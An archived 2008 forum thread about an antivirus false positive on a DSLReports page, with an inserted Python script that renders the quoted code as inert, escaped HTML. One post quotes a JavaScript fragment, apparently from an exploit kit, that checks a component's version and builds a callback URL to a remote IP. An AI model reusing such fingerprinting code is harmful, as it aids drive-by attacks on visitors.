Warning from NOD32 on DSLR-security-forum thread

Discussion in 'NOD32 version 2 Forum' started by FanJ, Nov 22, 2008.

Thread Status:
Not open for further replies.
  1. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    3,158
    Posting in this thread at DSLR Security forum:
    http://www.dslreports.com/forum/r21467816-Key-Logger-586523233

     
  2. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    3,158
    The thread at the DSLR board on which NOD32 gives a warning, is this one:

    hxxp://www.dslreports.com/forum/r21054284-Trojan-Win32Agentpz-from-Stoneybrook-Assisted-Living-site

    (I have changed http into hxxp)

    That thread is two pages long on my machine and I get the warning on the second page.

    I have already sent an IM to Marcos here on the Wilders board.
    I completely understand that it is weekend and that ESET has at the moment not the time to look at it.
    I hope that they will have a look at it after the weekend (please).
     
  3. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    3,158
    Maybe the following two screenshots are too big.

    IMON warning
     

  4. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    3,158
    AMON warning
     

  5. ASpace

    ASpace Guest

    Do you suspect that the javascript detection is false positive ?
     
  6. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    3,158
    Hi HiTech_boy,

    Somehow that is indeed what I'm thinking.
    I hardly can believe that there is a malware on the DSLR/BBR security forum.
    The warning I am getting makes me think of a heuristic detection.
    I cannot have a look at that second page because NOD is blocking it and I do not want to disable NOD at this moment.
    If I see any warning from NOD32 on a file, of course I would send it in in a password-protected ZIP file; but what to do in this case? That's why I have sent Marcos an IM here at Wilders.
     
  7. doktornotor

    doktornotor Registered Member

    Joined:
    Jul 19, 2008
    Posts:
    2,047
    There's no malicious JS in there... this gets triggered on the plaintext code listing there. Already been debated before with some other example:

    Code:
    var i,l,v;
    num = 2;
    s = '{08B0E5C0-4FCB-11CF-AAA5-00401C608500}';
    l = testing.isComponentInstalled(s,'ComponentID');
    v = testing.getComponentVersion(s,'ComponentID');
    if (l == true) {
        x = v.split(',');
        if ( (x[0]!=0) && (x[2]<3810) ) {
            num = 1;
        }
    }

    c = 'http://58.65.232.33/'+'counter.php'+'?b='+num;
    Try to paste the above between <HTML><BODY><PRE> paste here </PRE></BODY></HTML> tags and save the file as test.html or whatever and watch NOD32 to quarantine it.
     
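The reproduction doktornotor describes above, wrapping an inert code listing in a page so a scanner can be checked for a false positive, as an added example that is not part of the original post. It is my own script, not ESET's or the forum's: it takes the listing from the post as a constructed sample, HTML-escapes it so the browser shows the text and never parses it as markup or script (note the `<` in `x[2]<3810`, which must become `&lt;` to display correctly), and offers a small check that the result contains no tags beyond the wrapper. The file name `test.html` is the one the post suggests.

```python
import html
import re

# Constructed sample: the JavaScript listing quoted in the forum post, which
# the post says triggers the NOD32 heuristic even when shown as plain text.
SAMPLE_LISTING = """var i,l,v;
num = 2;
s = '{08B0E5C0-4FCB-11CF-AAA5-00401C608500}';
l = testing.isComponentInstalled(s,'ComponentID');
v = testing.getComponentVersion(s,'ComponentID');
if (l == true) {
    x = v.split(',');
    if ( (x[0]!=0) && (x[2]<3810) ) {
        num = 1;
    }
}

c = 'http://58.65.232.33/'+'counter.php'+'?b='+num;
"""

# Tags the wrapper itself emits; anything else would mean the listing
# leaked through as real markup.
WRAPPER_TAGS = {"html", "head", "title", "body", "pre"}


def wrap_inert_listing(code: str, title: str = "inert listing") -> str:
    """Return an HTML document that displays `code` as text inside <pre>.

    html.escape() converts <, >, &, and quotes to entities, so the browser
    renders the characters literally and nothing in `code` can run.
    """
    return (
        "<html><head><title>{}</title></head>"
        "<body><pre>{}</pre></body></html>"
    ).format(html.escape(title), html.escape(code))


def contains_foreign_markup(document: str) -> bool:
    """True if any tag other than the wrapper's own tags appears.

    This is a sanity check on the escaping, not a full HTML parser: a
    properly escaped listing contains no '<' at all outside the wrapper.
    """
    tags = re.findall(r"</?([A-Za-z][A-Za-z0-9]*)", document)
    return any(tag.lower() not in WRAPPER_TAGS for tag in tags)


def write_test_page(path: str = "test.html", code: str = SAMPLE_LISTING) -> str:
    """Write the inert page to `path` and return the document written."""
    document = wrap_inert_listing(code)
    assert not contains_foreign_markup(document), "escaping failed"
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(document)
    return document


if __name__ == "__main__":
    write_test_page()
    print("wrote test.html; open it or scan it to check the scanner's verdict")
```

Because the listing is entity-encoded, the file is inert in any browser; a detection on it can only come from pattern matching on the text, which is exactly the false-positive scenario the thread is about.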
  8. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    3,158
    said by doktornotor:
    Hi,

    Where has this been debated before?
     
  9. doktornotor

    doktornotor Registered Member

    Joined:
    Jul 19, 2008
    Posts:
    2,047
    Cannot find the debate ATM, anyway same problem - some code pasted in plaintext on a website that doesn't get executed at all triggered this. This one is apparently a heuristics issue specific to NOD32, tried w/ Avira Premium, no such false positive. Reproduced w/ v3 and v4 beta as well.
     
  10. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    3,158
    OK, thanks for checking it!

    Let's hope that ESET will jump in too (haven't heard back from Marcos yet; but as I said, it is the weekend now).
     
  11. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    3,158
    As for this moment: no official reply from ESET (neither here in public, nor at the DSLR/BBR board in public, nor in private from Marcos).
    Like I said, I know that it is the weekend; but I would have liked a reply like "we will look at it". But even that did not happen.
     
  12. ASpace

    ASpace Guest

    Currently with update 3634, I no longer see any alerts and I can browse the forum
     
  13. doktornotor

    doktornotor Registered Member

    Joined:
    Jul 19, 2008
    Posts:
    2,047
    Yeah, looks good now. :thumb:
     
  14. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    3,158
    Yep, it's fixed :thumb:

    Thank you ESET, and thank you Marcos for your IM. I really do appreciate it!
     